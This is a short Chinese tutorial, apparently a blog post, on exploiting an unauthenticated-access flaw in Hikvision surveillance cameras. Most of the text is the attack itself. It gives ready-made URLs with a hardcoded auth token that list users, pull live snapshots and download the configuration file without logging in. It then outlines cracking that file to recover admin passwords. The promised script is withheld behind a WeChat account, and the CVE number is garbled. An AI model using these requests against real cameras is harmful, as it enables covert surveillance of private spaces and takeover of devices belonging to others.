注:此教程仅供学习参考,不涉及任何以破坏为目的的违法犯罪,个人行为与作者无关。
一、漏洞描述
1.这是一个海康威视摄像头后台管理未授权漏洞,通过构造URL可绕过登录查看监控,检索所有用户和配置文件下载,并获取到监控后台管理账号和密码。
二、漏洞复现
1.在web浏览器中输入以下代码来检索用户与用户列
http://摄像头IP地址/Security/users?auth=YWRtaW46MTEK
2.在没有进行登录的情况下获取监控快照
http://摄像头IP地址/onvif-http/snapshot?auth=YWRtaW46MTEK
3.下载摄像头配置文件
http://摄像头IP地址/System/configurationFile?auth=YWRtaW46MTEK
4.用python脚本对配置文件进行破解(脚本放在结尾)
5.验证密码是否正确
关注微信公众号菜鸟学渗透后台回复CVE--7921获取脚本
得点赞+关注,关注微信公众号菜鸟学渗透,有任何问题可以后台私信我!
